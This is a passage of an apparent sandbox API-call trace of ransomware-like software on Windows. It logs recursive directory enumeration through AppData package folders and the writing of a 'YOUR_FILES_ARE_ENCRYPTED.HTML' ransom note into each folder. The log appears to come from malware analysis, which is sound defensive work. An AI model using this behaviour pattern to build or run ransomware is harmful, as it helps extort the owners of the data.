RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\tempstate\\sharecache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.608] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.609] CloseHandle (hObject=0x324) returned 1 [0119.609] GetProcessHeap () returned 0x600000 [0119.609] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.609] GetProcessHeap () returned 0x600000 [0119.609] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.609] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d5bb6bd, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2d5bb6bd, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2d5bb6bd, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="ShareCache", cAlternateFileName="SHAREC~1")) returned 0 [0119.609] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.610] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0119.610] GetProcessHeap () returned 0x600000 [0119.610] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.611] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.612] CloseHandle (hObject=0x31c) returned 1 [0119.612] GetProcessHeap () returned 0x600000 [0119.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.612] GetProcessHeap () returned 0x600000 [0119.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2da3edc7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2da3edc7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0119.612] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.612] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0119.612] GetProcessHeap () returned 0x600000 [0119.612] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0119.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.613] WriteFile (in: hFile=0x214, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0119.614] CloseHandle (hObject=0x214) returned 1 [0119.615] GetProcessHeap () returned 0x600000 [0119.615] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.615] GetProcessHeap () returned 0x600000 [0119.615] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.617] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97d7ec6c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", cAlternateFileName="MICROS~1.SEC")) returned 1 [0119.617] StrStrIW (lpFirst="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.617] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy") returned 104 [0119.617] GetProcessHeap () returned 0x600000 [0119.617] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.618] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" [0119.618] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\*" [0119.618] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97d7ec6c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.620] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97d7ec6c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0119.620] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0119.620] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.620] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC") returned 107 [0119.620] GetProcessHeap () returned 0x600000 [0119.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.621] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC" [0119.621] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\*" [0119.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.623] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.623] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.623] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.623] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache") returned 117 [0119.623] GetProcessHeap () returned 0x600000 [0119.623] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.634] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache" [0119.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\*" [0119.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.635] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 1 [0119.635] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 0 [0119.635] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.635] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0119.635] GetProcessHeap () returned 0x600000 [0119.635] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.637] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.638] CloseHandle (hObject=0x320) returned 1 [0119.638] GetProcessHeap () returned 0x600000 [0119.638] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.638] GetProcessHeap () returned 0x600000 [0119.638] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.638] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.638] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies") returned 119 [0119.638] GetProcessHeap () returned 0x600000 [0119.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.639] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies" [0119.639] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\*" [0119.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.639] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 1 [0119.639] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 0 [0119.639] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.639] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0119.639] GetProcessHeap () returned 0x600000 [0119.639] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.640] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.641] CloseHandle (hObject=0x320) returned 1 [0119.641] GetProcessHeap () returned 0x600000 [0119.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.641] GetProcessHeap () returned 0x600000 [0119.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.641] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.642] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.642] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory") returned 119 [0119.642] GetProcessHeap () returned 0x600000 [0119.642] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.642] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory" [0119.642] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\*" [0119.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, 